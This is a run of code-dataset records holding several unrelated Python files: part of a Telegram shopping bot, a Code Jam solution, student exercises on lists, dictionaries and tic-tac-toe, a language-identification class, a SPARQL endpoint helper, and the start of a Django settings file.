text=text_data)\n\ndef SetLangForUser(updater, context):\n data = GetDataInUpdater(updater)\n\n locate = updater.callback_query.data\n\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n Worker(\"tg\").SetLocateFromUser(data[\"user_id\"], locate)\n\n # Start buttons\n AddProductsButtonsInBusket(updater, context)\n\ndef CreateBtnSenderPhoneNumber(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n send_phone_number = KeyboardButton(text=Core.GetRandomLocalizationString(locate, \"SendPhoneNumber\"), request_contact=True)\n\n btnsList = [[send_phone_number]]\n markup = ReplyKeyboardMarkup(btnsList, resize_keyboard=True, one_time_keyboard=True)\n\n text = Core.GetRandomLocalizationString(locate, \"SendMePhone\")\n context.bot.send_message(text=text, reply_markup=markup, chat_id=data[\"chat_id\"])\n\n\ndef GetUserPhoneNumber(updater, context):\n pass\n\ndef SetUserLocation(updater, context):\n data = GetDataInUpdater(updater)\n\n longtude, latitude = updater.message.location.longitude, updater.message.location.latitude\n\n msg_text = Core.GetAddressFromCoords(longtude, latitude)\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n\ndef AddProductsButtonsInBusket(updater, context):\n data = GetDataInUpdater(updater)\n\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n start_order = KeyboardButton(Core.GetRandomLocalizationString(locate, \"StartOrder\"))\n history_order = KeyboardButton(Core.GetRandomLocalizationString(locate, \"HistoryOrder\"))\n\n btnsList = [[start_order]]\n if Worker(\"tg\").UserHaveProductsInBascet(data[\"user_id\"]):\n btnsList.append([history_order])\n markup = ReplyKeyboardMarkup(btnsList, resize_keyboard=True, one_time_keyboard=True)\n\n text = Core.GetRandomLocalizationString(locate, \"GoodAddMainInformation\")\n\n context.bot.send_message(text=text, reply_markup=markup, chat_id=data[\"chat_id\"])\n\ndef SelectedProductsType(updater, context):\n data = GetDataInUpdater(updater)\n result = str(updater.callback_query.data).split(\" \")[1]\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n GetProductsFromUser(updater, context, \"product \" + result)\n\ndef SelectedProduct(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n result = str(updater.callback_query.data).split(\" \")\n\n if result[1] == \"return\":\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n GetProductsFromUser(updater, context, \"types\")\n\n else:\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n Worker(\"tg\").AddInUserBuscetProduct(data[\"user_id\"], result[1])\n msg_text = Core.GetRandomLocalizationString(locate, \"ProductAdded\")\n msg_text = msg_text.format(Core.GetLocalizationProductName(locate, result[2]))\n\n history_order = KeyboardButton(Core.GetRandomLocalizationString(locate, \"HistoryOrder\"))\n markup = ReplyKeyboardMarkup([[history_order]], resize_keyboard=True, one_time_keyboard=True)\n\n if Worker(\"tg\").UserHaveProductsInBascet(data[\"user_id\"]):\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text, reply_markup=markup)\n else:\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n GetProductsFromUser(updater, context, \"product \" + result[3])\n\n\ndef GetProductsFromUser(updater, context, type_data):\n data = GetDataInUpdater(updater)\n 
locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n msg_text = \"Ничего нет из известного(\"\n btns = []\n\n if type_data == \"types\":\n SetStateUser(data[\"user_id\"], \"view_product_types\")\n temp_data_tables = Worker(\"tg\").GetProductsType()\n for row in temp_data_tables:\n text_btn = Core.GetLocalizationProductsType(locate, str(row[1]))\n btns.append([InlineKeyboardButton(text=text_btn, callback_data=\"product_types \" + str(row[0]))])\n\n if type_data.startswith(\"product\"):\n SetStateUser(data[\"user_id\"], \"selected_product_types_\" + type_data.split(\" \")[1])\n temp_data_tables = Worker(\"tg\").GetProductsForType(type_data.split(\" \")[1])\n for row in temp_data_tables:\n text_btn = Core.GetLocalizationProductName(locate, str(row[1]))\n btns.append([InlineKeyboardButton(text=text_btn, callback_data=\"product {} {} {}\".format(str(row[0]), str(row[1]), str(row[2])) )])\n\n btns.append([InlineKeyboardButton(text=Core.GetRandomLocalizationString(locate, \"Return\"), callback_data=\"product return\")])\n\n if len(btns) > 0:\n markup = InlineKeyboardMarkup(btns)\n if type_data == \"types\":\n msg_text = Core.GetRandomLocalizationString(locate, \"SelectProductsType\")\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text, reply_markup=markup)\n return\n elif type_data.startswith(\"product\"):\n msg_text = Core.GetRandomLocalizationString(locate, \"SelectProduct\")\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text, reply_markup=markup)\n return\n\n # if error\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n\ndef GetOrders(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n dataOrder = Worker(\"tg\").GetUserOrder(data[\"user_id\"])\n\n msg_text = \"У вас в корзмне:\\n\"\n for dataProduct in dataOrder:\n msg_text += Core.GetLocalizationProductName(locate, str(dataProduct[1])) + \"\\n\"\n\n markup = InlineKeyboardMarkup([\n [InlineKeyboardButton(text=\"Заказать\", callback_data=\"send_order buy\")],\n [InlineKeyboardButton(text=\"Очистить\", callback_data=\"send_order clear\")],\n [InlineKeyboardButton(text=\"Вернутся\", callback_data=\"send_order return\")]\n ])\n\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text, reply_markup=markup)\n\ndef TreatmentOrders(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n result = str(updater.callback_query.data).split(\" \")\n msg_text = \"\"\n\n if result[1] == \"return\":\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n GetProductsFromUser(updater, context, \"types\")\n elif result[1] == \"clear\":\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n msg_text = \"Ваша карзина очищена\"\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n context.bot.send_chat_action(chat_id=data[\"chat_id\"], action=telegram.ChatAction.TYPING)\n time.sleep(1)\n GetProductsFromUser(updater, context, \"types\")\n elif result[1] == \"buy\":\n context.bot.delete_message(message_id=data[\"msg_id\"], chat_id=data[\"chat_id\"])\n msg_text = \"Заказ оформлен\"\n context.bot.send_message(chat_id=data[\"chat_id\"], text=msg_text)\n\n\n#functions from add\n\ndef AddProductsType(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n temd_data = data[\"msg_text\"].replace(\"/AddProductsType\", 
\"\").strip().split(\" \")\n try:\n key = temd_data[0]\n name = temd_data[1]\n Worker(\"tg\").AddProductsType(userId=data[\"user_id\"], key=key, name=name, locate=locate)\n except Exception as ex:\n Core.WriteErrorMes(ex.args[0])\n\ndef AddProduct(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n temd_data = data[\"msg_text\"].replace(\"/AddProduct\", \"\").strip().split(\" \")\n try:\n key = temd_data[0]\n name = temd_data[1].replace(\"_\", \" \")\n category = temd_data[2]\n Worker(\"tg\").AddProduct(userId=data[\"user_id\"], key=key, name=name, category=category, locate=locate)\n except Exception as ex:\n Core.WriteErrorMes(ex.args[0])\n\n#functions from tests\ndef TestButtons(updater, context):\n data = GetDataInUpdater(updater)\n locate = Worker(\"tg\").GetLocateFromUser(data[\"user_id\"])\n\n temd_data = data[\"msg_text\"].replace(\"/TestButtons\", \"\").strip().split(\" \")\n count = temd_data[0]\n\n btnsList = []\n for i in range(0, int(count)):\n btnsList.append([InlineKeyboardButton(text=\"Кнопка\" + str(i), callback_data=\"test btn\" + str(i))])\n\n markup = InlineKeyboardMarkup(btnsList)\n text = \"Тестируем количество кнопок\"\n\n context.bot.send_message(text=text, chat_id=data[\"chat_id\"], reply_markup=markup)\n\n\n","sub_path":"PerfectProject/Erie/telegram_core/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":14379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"594580679","text":"import string\ndata=open(\"A-large.in\",\"r\")\ns1=data.read()\ns1=s1.split(\"\\n\")\nt=int(s1[0])\nfor i in range(1,t+1):\n\tn=int(s1[i])\n\tif(n==0):\n\t\tprint(\"Case #{0}: INSOMNIA\".format(i))\n\t\tcontinue\n\ts=str(n)\n\tc=0\n\tl=[0 for j in range(10)]\n\tm=1\n\twhile (True):\n\t\ts=str(n*m)\n\t\tfor j in s:\n\t\t\tk = int(j)\n\t\t\tif(l[k]==0):\n\t\t\t\tl[k]=1\n\t\t\t\tc+=1\n\t\t\tif(c==10):\n\t\t\t\tbreak\n\t\tif(c==10):\n\t\t\tbreak\n\t\telse:\n\t\t\tm+=1\n\tif(c==10):\n\t\tprint(\"Case #{0}: {1}\".format(i,n*m))\n\n\n","sub_path":"codes/CodeJamCrawler/CJ/16_0_1_adarshpandey_codejam1.py","file_name":"16_0_1_adarshpandey_codejam1.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"635624854","text":"# There is no check for a draw in tic-tac-toe\n# nice work on the game though.\n# There are some places where the code could be more efficient. Particularly in the checks. You check both x and o for every combination.\n# Think about the DRY principle.\n# It would be easier to send the player (x or o) to the check. This would be easier than copy paste and adding unnecessary lines of code and conditional checks. \n\n# LISTS (35PTS TOTAL)\n# In these exercises you write functions. Of course, you should not only write the functions,\n# you should also write code to test them. For practice, you should also comment your\n# functions as explained above.\nimport random\n\n# PROBLEM 1 (8-ball - 5pts)\n# A magic 8-ball, when asked a question, provides a random answer from a list.\n# The code below contains a list of possible answers. 
Create a magic 8-ball program that\n# prints a random answer.\nanswer_list = [\"It is certain\", \"It is decidedly so\", \"Without a \\\ndoubt\", \"Yes, definitely\", \"You may rely on it\", \"As I see it, \\\nyes\", \"Most likely\", \"Outlook good\", \"Yes\", \"Signs point to yes\",\n \"Reply hazy try again\", \"Ask again later\", \"Better not tell you \\\nnow\", \"Cannot predict now\", \"Concentrate and ask again\", \"Don ' t \\\ncount on it\", \"My reply is no\", \"My sources say no\", \"Outlook \\\nnot so good\", \"Very doubtful\"]\n\n\ndef magicball():\n question = input(\"Ask the magic ball anything: \")\n if question:\n print(answer_list[random.randrange(len(answer_list))])\n\n\nmagicball()\n\n\n\n\n\n# PROBLEM 2 (Shuffle - 5pts)\n# A playing card consists of a suit (Heart, Diamond, Club, Spade) and a value (2,3,4,5,6,7,8,9,10,J,Q,K,A).\n# Create a list of all possible playing cards, which is a deck.\n# Then create a function that shuffles the deck, producing a random order.\ndef deckprinter():\n suit = [\"Heart\", \"Diamond\", \"Club\", \"Spade\"]\n value = []\n deck = []\n for i in range(2, 11):\n value.append(i)\n value.extend([\"J\", \"Q\", \"K\", \"A\"])\n\n for i in range(13):\n for j in range(4):\n deck.append(str(value[i]) + \" of \" + str(suit[j]))\n for i in range(52):\n deck[i] = deck[random.randrange(1, 52)]\n print(deck)\n\n\ndeckprinter()\n\n\n# PROBLEM 3 (The sieve of Eratosthenes - 10pts)\n# The sieve of Eratosthenes is a method to find all prime numbers between\n# 1 and a given number using a list. This works as follows: Fill the list with the sequence of\n# numbers from 1 to the highest number. Set the value of 1 to zero, as 1 is not prime.\n# Now loop over the list. Find the next number on the list that is not zero,\n# which, at the start, is the number 2. Now set all multiples of this number to zero.\n# Then find the next number on the list that is not zero, which is 3.\n# Set all multiples of this number to zero. Then the next number, which is 5\n# (because 4 has already been set to zero), and do the same thing again.\n# Process all the numbers of the list in this way. 
When you have finished,\n# the only numbers left on the list are primes.\n# Use this method to determine all the primes between 1 and 1000.\n\ndef eras(n):\n number_list = []\n new_list = []\n\n for i in range(1, n + 1):\n number_list.append(i)\n number_list[0] = 0\n for i in range(1, len(number_list)):\n if number_list[i] != 0:\n new_list.append(number_list[i])\n for j in range(i + 1, len(number_list)):\n if number_list[j] % number_list[i] == 0:\n number_list[j] = 0\n print(new_list)\n\n\n# eras(1000)\n\n\n\n# PROBLEM 4 (Tic-Tac-Toe - 15pts)\n# Write a Tic-Tac-Toe program that allows two people to play the game against each other.\n# In turn, ask each player which row and column they want to play.\n# Make sure that the program checks if that row/column combination is empty.\n# When a player has won, end the game.\n# When the whole board is full and there is no winner, announce a draw.\n# This is a fairly long program to write (60 lines or so).\n# It will definitely help to use some functions.\n# I recommend that you create a function display_board() that gets the board\n# as parameter and displays it,\n# a function get_row_column() that asks for a row or a column (depending on a parameter)\n# and checks whether the user entered a legal value,\n# and a function winner() that gets the board as argument and checks if there is a winner.\n# Keep track of who the current player is using a global variable player that you can\n# pass to a function as an argument if the function needs it.\n# I also use a function opponent(), that takes the player as argument and returns\n# the opponent. I use that to switch players after each move.\nboard = [[\" \", \" \", \" \"], [\" \", \" \", \" \"], [\" \", \" \", \" \"]]\n\n\ndef show_board():\n print(\" \", board[0][0], \"|\", board[1][0], \"|\", board[2][0])\n print(\"--------------\")\n print(\" \", board[0][1], \"|\", board[1][1], \"|\", board[2][1])\n print(\"--------------\")\n print(\" \", board[0][2], \"|\", board[1][2], \"|\", board[2][2])\n\n\ndef win_check():\n if board[0][0] == board[1][0] == board[2][0] == \"X\" :\n print(\"X Wins\")\n return 1\n elif board[0][0] == board[1][0] == board[2][0] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][1] == board[1][1] == board[2][1] == \"X\" :\n print(\"X wins\")\n return 1\n elif board[0][1] == board[1][1] == board[2][1] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][2] == board[1][2] == board[2][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[0][2] == board[1][2] == board[2][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][0] == board[1][1] == board[2][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[0][0] == board[1][1] == board[2][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][2] == board[1][1] == board[2][0] == \"X\":\n print(\"X wins\")\n return 1\n elif board[0][2] == board[1][1] == board[2][0] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][0] == board[0][1] == board[0][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[0][0] == board[0][1] == board[0][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[1][0] == board[1][1] == board[1][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[1][0] == board[1][1] == board[1][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[2][0] == board[2][1] == board[2][2] == \"X\":\n print(\"X wins\")\n return 1\n elif board[2][0] == board[2][1] == board[2][2] == \"O\":\n print(\"O wins\")\n return 1\n elif board[0][0] != board[1][0] != board[2][0] != board[0][1] != board[1][1] 
!= board[2][1] != board[0][2] != \\\n board[1][2] != board[2][2]:\n print(\"Tie\")\n return 1\n\n\ndef mainfunc():\n i = 0\n done = False\n '''\n def choose(i):\n m=0\n row = input(\"Choose your row: \")\n row = int(row)\n colum = input(\"Choose your column: \")\n colum = int(colum)\n if (row <= 3 > 0) and (colum <= 3 > 0):\n if board[colum - 1][row - 1] != \"X\" and board[colum - 1][row - 1] != \"O\":\n if i % 2 == 0:\n board[colum - 1][row - 1] = \"X\"\n else:\n board[colum - 1][row - 1] = \"O\"\n show_board()\n\n else:\n print(\"Sorry the spot is taken\")\n i-=1\n else:\n print(\"Sorry that point does not exist\")\n i-=1\n return i\n '''\n while not done:\n win_check()\n win = win_check()\n if win == 1:\n done = True\n\n i += 1\n row = input(\"Choose your row: \")\n row = int(row)\n colum = input(\"Choose your column: \")\n colum = int(colum)\n if (row <= 3 > 0) and (colum <= 3 > 0):\n if board[colum - 1][row - 1] != \"X\" and board[colum - 1][row - 1] != \"O\":\n if i % 2 == 0:\n board[colum - 1][row - 1] = \"X\"\n else:\n board[colum - 1][row - 1] = \"O\"\n show_board()\n\n else:\n print(\"Sorry the spot is taken\")\n i -= 1\n else:\n print(\"Sorry that point does not exist\")\n i -= 1\n\n\n\n\nmainfunc()\n\n\n# The main program will be something along the lines of (in pseudo-code):\n# display board\n# while True:\n# ask for row\n# ask for column\n# if row/column already occupied:\n# display error\n# place player marker in row/col\n# display board\n# check for winner:\n# announce winner\n# break\n# check board full:\n# announce draw\n# break\n# switch player\n\n# CHALLENGE PROBLEM 5 (Battleship NO CREDIT, JUST IF YOU WANT TO TRY IT)\n# Create a program that is a simplified version of the game “Battleship.”\n# The computer creates (in memory) a grid that is 4 cells wide and 3 cells high.\n# The rows of the grid are numbered 1 to 3, and the columns of the grid are labeled A to D.\n# The computer hides a battleship in three random cells in the grid.\n# Each battleship occupies exactly one cell.\n# Battleships are not allowed to touch each other horizontally or vertically.\n# Make sure that the program places the battleships randomly, so not pre-configured.\n# The computer asks the player to “shoot” at cells of the grid.\n# The player does so by entering the column letter and row number of the cell\n# which she wants to shoot at (e.g., \"D3\").\n# If the cell which the player shoots at contains nothing, the computer responds with “Miss!”\n# If the cell contains a battleship, the computer responds with “You sunk my battleship!”\n# and removes the battleship from the cell (i.e., a second shot at the same cell is a miss).\n# As soon as the player hits the last battleship, the computer responds with displaying\n# how many shots the player needed to shoot down all three battleships, and the program ends.\n# To help with debugging the game, at the start the computer should display the grid with\n# O's marking empty cells and X's marking cells with battleships.\n# Hint: If you have troubles with this exercise, start by using a board which has the\n# battleships already placed.\n# Once the rest of the code works, add a function that places the battleships at random,\n# at first without checking if they are touching one another.\n# Once that works, add code that disallows battleships touching each other.\n","sub_path":"Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":10433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 
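The review comments at the top of the Lists.py record above ask for a DRY rewrite of win_check() and for a draw check, and the shuffle loop in deckprinter() (deck[i] = deck[random.randrange(1, 52)]) copies cards over other cards rather than permuting the deck. Below is a minimal illustrative sketch, not code from the record: the winner() and board_full() helpers, the WIN_LINES table, and the list-of-lists board argument are names introduced here for the example, and random.shuffle is the standard-library Fisher-Yates shuffle.

    import random

    # Eight winning lines of a 3x3 board, written out once. The student's board is
    # indexed board[column][row]; win detection is symmetric, so orientation does not matter.
    WIN_LINES = [
        [(0, 0), (0, 1), (0, 2)], [(1, 0), (1, 1), (1, 2)], [(2, 0), (2, 1), (2, 2)],
        [(0, 0), (1, 0), (2, 0)], [(0, 1), (1, 1), (2, 1)], [(0, 2), (1, 2), (2, 2)],
        [(0, 0), (1, 1), (2, 2)], [(0, 2), (1, 1), (2, 0)],
    ]

    def winner(board, player):
        # One check reused for both marks, e.g. winner(board, "X") / winner(board, "O").
        return any(all(board[c][r] == player for (c, r) in line) for line in WIN_LINES)

    def board_full(board):
        # Draw test: the board is full when no cell still holds the blank " " marker.
        return all(cell != " " for column in board for cell in column)

    # random.shuffle performs an in-place Fisher-Yates permutation, so every card
    # appears exactly once, unlike the overwrite loop in deckprinter().
    deck = ["{} of {}".format(v, s)
            for v in list(range(2, 11)) + ["J", "Q", "K", "A"]
            for s in ["Heart", "Diamond", "Club", "Spade"]]
    random.shuffle(deck)

With these helpers, the fifteen elif branches in win_check() reduce to winner(board, "X"), winner(board, "O"), and a board_full() tie test, which also avoids the unreliable chained != comparison the record uses for the tie case.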
+{"seq_id":"284375906","text":"person = {'first_name': 'Calvin','last_name': 'Howe','age': 12,'city': 'Kansas City'}\n\nprint(person['first_name'])\nprint(person['last_name'])\nprint(person['age'])\nprint(person['city'])\n\n\nnumbers = {'Calvin': [20,12,6,8,10],'geoffrey': [2,0],'lily': [12],'john': [13,100,20],'brandon': [10]}\n\nprint(f\"\\nCalvin's favorite numbers are {numbers['Calvin']}.\")\nprint(f\"\\ngeoffrey's favorite numbers are {numbers['geoffrey']}.\")\nprint(f\"\\nlily's favorite numbers are {numbers['lily']}.\")\nprint(f\"\\njohn's favorite numbers are {numbers['john']}.\")\nprint(f\"\\nbrandon's favorite numbers are {numbers['brandon']}.\")\n\n\npy_words = {'print': 'print shows the output.','for loop':\n 'for loops loop through the values of a list.','list':\n 'A list is a group of data.','variables':\n 'A variable represents a piece of data.','python':\n 'python is a type of programing.','dictionary':\n 'A dictionary is another way of storing data.','del':\n 'del deletes elements of a list.','insert':\n 'insert puts values into a list.','title':\n 'title is how you make things uppercase.', 'comment':\n 'A comment lets you write notes in English'}\n\n\nfor key, value in py_words.items():\n print(f\"\\nWord: {key}\")\n print(f\"Meaning: {value}\")\n\nrivers_of_the_world = {'Nile': 'Egypt','Amazon': 'Brazil','Mississipie': 'USA'}\nfor k in rivers_of_the_world:\n if k == 'Nile':\n print('\\nThe Nile runs through Egypt')\n if k == 'Amazon':\n print('\\nThe Amazon might be the longest river in the world.')\n if k == 'Mississipie':\n print('\\nThe Mississipie is slow, but wide.')\n\nfor river in rivers_of_the_world.keys():\n print(river)\n\nfor country in rivers_of_the_world.values():\n print(country)\n\n\npolled_people = ['jen', 'prim', 'samuel', 'harry', 'john']\n\nfavorite_languages = {\n 'jen': 'python',\n 'sarah': 'c',\n 'edward': 'ruby',\n 'phil': 'python'\n }\n\nfor people in polled_people:\n if people in favorite_languages:\n print('Thank you for responding.')\n else:\n print('Please take our poll.')\n\nperson = {'first_name': 'Calvin','last_name': 'Howe','age': 12,'city': 'Kansas City'}\nperson_2 = {'first_name': 'Frodo','last_name': 'Baggins','age': 51,'city':'Hobbiton'}\nperson_3 = {'first_name': 'Martin','last_name': 'Howe','age': 3,'city': 'Kansas City'}\n\npeoples = [person, person_2, person_3]\n\nfor people in peoples:\n print(people)\n\npet = {'type': 'panther','owner': \"Drizzt Do'Urden\",'name': 'Guenhaver'}\npet_2 = {'type': 'brown bear','owner': 'Anna','name': 'Wojtek'}\npet_3 = {'type': 'wolf','owner': 'Gunter','name': 'Nacht'}\n\npets = [pet, pet_2, pet_3]\n\nfor pet in pets:\n print(pet)\n\n\nnumbers = {'Calvin': [5, 20, 12, 6, 8, 10],\n 'geoffrey': [2, 0],\n 'lily': [12],\n 'john': [13, 100, 20],\n 'brandon': [10]}\n\nprint(f\"\\nCalvin's favorite numbers are {numbers['Calvin']}.\")\nprint(f\"\\ngeoffrey's favorite numbers are {numbers['geoffrey']}.\")\nprint(f\"\\nlily's favorite numbers are {numbers['lily']}.\")\nprint(f\"\\njohn's favorite numbers are {numbers['john']}.\")\nprint(f\"\\nbrandon's favorite numbers are {numbers['brandon']}.\")\n\ncities = {'city_one':\n {'name': 'Crete',\n 'pop': 'unknown',\n 'country': 'Greece',\n 'fact': 'Crete is the home of the minotaur in Greek myths.'},\n 'city_two': {'name': 'Athens',\n 'pop': 'unknown',\n 'country': 'Greece',\n 'fact': 'The Greek hero Theseus ousted Medea here.'},\n 'city_three':{'name': 'Thebes',\n 'pop': 'unknown',\n 'country': 'Greece',\n 'fact': 'The city was founded when a cow died, marking 
the spot.'}}\n\nprint(f\"\\n{cities['city_one']}\")\nprint(f\"\\n{cities['city_two']}\")\nprint(f\"\\n{cities['city_three']}\")\n\n","sub_path":"python_crash_course/calvin/basics/dictonarys.py","file_name":"dictonarys.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"355247392","text":"import pickle\nimport numpy as np\nfrom languageIdentificationInputPreprocessing import LanguageIdentificationPreprocessing\nclass LanguageIdentifier:\n def __init__(self):\n self.model = pickle.load(open('models/final_languageIdentification.pkl', 'rb'))\n self.vectorizer = pickle.load(open(\"models/vectorizer.pkl\", 'rb'))\n self.pre = LanguageIdentificationPreprocessing()\n\n def languageIdentification(self, text):\n # removing emails\n x_input = self.pre.remove_emails(text)\n\n # removing URLs\n x_input = self.pre.remove_url(x_input)\n\n # remove special characters\n x_input = self.pre.remove_special_characters(x_input)\n\n # remove accented characters\n x_input = self.pre.remove_accented_chars(x_input)\n\n # remove extra spaces\n x_input = self.pre.remove_extra_spaces(x_input)\n\n # convert to lower case\n x_input = self.pre.convert_to_lowercase(x_input)\n\n word_list = x_input.split()\n\n\n # remove the same letter repeating for more than twice\n x_input = x_input.replace(x_input, self.pre.remove_consecutives(word_list))\n\n # vectorized using the pickled vectorizor\n x_inputting = self.vectorizer.transform([x_input])\n\n # predict the class labels using the pickled model\n prediction = np.array2string(self.model.predict(x_inputting))\n\n return prediction\n\n\n","sub_path":"languageIdentification.py","file_name":"languageIdentification.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"342953422","text":"__author__ = 'geekscruff'\n\n\"\"\"This class is used to create endpoints of different types. Currently only sparql is supported.\"\"\"\n\nfrom flask import Flask\nimport endpoint_creator\nimport os\nimport logging\n\n# Global variables\nlogger = logging.getLogger(__name__)\napp = Flask(__name__)\n\nclass Endpoint:\n def __init__(self, ep):\n logger.debug(\"DEBUG endpoint.py - object instantiated\")\n self.ep = ep\n self.details = \"\"\n\n if os.path.isfile('/opt/peoplesparql/config.py'):\n logger.info(\"INFO endpoint.py - loaded production config\")\n app.config.from_pyfile('/opt/peoplesparql/config.py', silent=False)\n else:\n logger.info(\"INFO endpoint.py - loaded local config\")\n app.config.from_object('peoplesparql')\n\n # Used for new endpoints, although if the endpoint does exist in the repository, that's fine.\n def setup_new_sparql_endpoint(self, name):\n try:\n ep = endpoint_creator.EndpointCreator(self.ep, app.config['AG_DATASOURCES'])\n ep.setname(name)\n results = ep.docreate()\n logger.debug(\"DEBUG endpoint.py - results from endpoint created returned\")\n return results\n except ValueError as e:\n logger.error(\"ValueError endpoint.py - \" + e.message)\n raise ValueError(e.message)\n except Exception as e:\n logger.error(\"ERROR! 
endpoint.py - \" + e.message)\n raise Exception(e.message)\n\n # Used for endpoints we believe are already in the repository, although if they aren't, that's fine.\n def setup_existing_sparql_endpoint(self):\n try:\n results = endpoint_creator.EndpointCreator(self.ep, app.config['AG_DATASOURCES']).docreate()\n logger.debug(\"DEBUG endpoint.py - results from endpoint created returned\")\n return results\n except ValueError as e:\n logger.error(\"ValueError endpoint.py -- \" + e.message)\n raise ValueError(e.message)\n except Exception as e:\n logger.error(\"ERROR! endpoint.py -- \" + e.message)\n raise Exception(e.message)\n\n def setdetails(self, d):\n logger.debug(\"DEBUG endpoint.py - store the JSON results\")\n self.details = d\n\n def getdetails(self):\n logger.debug(\"DEBUG endpoint.py - return the endpoint details as JSON results\")\n return self.details\n","sub_path":"queryandexplore/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"541489317","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom environ import Env\nfrom raven import fetch_git_sha\nfrom raven.exceptions import InvalidGitRepository\n\nfrom django.utils.translation import ugettext_lazy as _\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nassert os.path.isfile(os.path.join(BASE_DIR, 'manage.py'))\n\nenv = Env()\nenv.read_env(os.path.join(BASE_DIR, '.env'))\n\nDEBUG = env.bool('DEBUG', default=True)\nSECRET_KEY = env.str('SECRET_KEY', default=('' if not DEBUG else 'xxx'))\ndefault_var_root = os.path.join(BASE_DIR, 'var')\nVAR_ROOT = env.str('VAR_ROOT', default_var_root)\n\nif not os.path.isdir(VAR_ROOT):\n print('Creating var root %s' % VAR_ROOT)\n os.makedirs(VAR_ROOT)\n\ndefault_database_url = 'sqlite:///%s' % os.path.join(VAR_ROOT, 'db.sqlite3').replace(os.sep, '/')\n\nDATABASES = {\n 'default': env.db_url(\n default=default_database_url\n )\n}\n\nINSTALLED_APPS = [\n 'djangocms_admin_style',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'cms',\n 'treebeard',\n 'menus',\n 'sekizai',\n 'easy_thumbnails',\n 'filer',\n 'mptt',\n 'djangocms_text_ckeditor',\n 'cmsplugin_filer_file',\n 'cmsplugin_filer_folder',\n 'cmsplugin_filer_link',\n 'cmsplugin_filer_image',\n 'cmsplugin_filer_teaser',\n 'workbench',\n]\n\nMIDDLEWARE_CLASSES = [\n 'cms.middleware.utils.ApphookReloadMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'cms.middleware.user.CurrentUserMiddleware',\n 'cms.middleware.page.CurrentPageMiddleware',\n 'cms.middleware.toolbar.ToolbarMiddleware',\n 'cms.middleware.language.LanguageCookieMiddleware',\n]\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 
